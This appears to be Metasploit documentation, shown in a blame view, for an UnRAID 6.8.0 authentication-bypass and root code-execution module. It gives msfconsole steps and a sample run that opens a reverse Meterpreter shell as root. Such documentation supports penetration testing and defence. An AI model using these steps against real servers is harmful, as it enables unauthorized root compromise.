Files
metasploit-gs/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md
T

47 lines
1.6 KiB
Markdown
Raw Normal View History

2020-03-20 15:33:20 +01:00
## Vulnerable Application
2020-03-21 11:44:35 +01:00
This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.
2020-03-20 15:33:20 +01:00
### Description
This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then
performs remote code execution as root by abusing the *extract* function used in the `template.php` file.
### Testing Environment
Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.
## Verification Steps
1. Setup UnRAID 6.8.0
2. Start `msfconsole`
2020-03-21 11:44:35 +01:00
3. `use exploit/linux/http/unraid_auth_bypass_exec`
2020-03-20 15:33:20 +01:00
4. `set RHOST [UNRAID]`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
2020-03-21 11:44:35 +01:00
**TARGETURI** : The URI of the Unraid application
2020-03-20 15:33:20 +01:00
## Scenarios
```
2020-03-21 11:44:35 +01:00
msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
2020-03-20 15:33:20 +01:00
RHOSTS => 10.10.0.173
2020-03-21 11:44:35 +01:00
msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
2020-03-20 15:33:20 +01:00
[*] 10.10.0.173:80 - The target appears to be vulnerable.
2020-03-21 11:44:35 +01:00
msf5 exploit(linux/http/unraid_auth_bypass_exec) > run
2020-03-20 15:33:20 +01:00
[*] Started reverse TCP handler on 10.10.0.161:4444
[*] Sending stage (38288 bytes) to 10.10.0.173
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
2020-03-21 11:44:35 +01:00
[+] Request timed out, OK if running a non-forking/blocking payload...
2020-03-20 15:33:20 +01:00
meterpreter > getuid
Server username: root (0)
```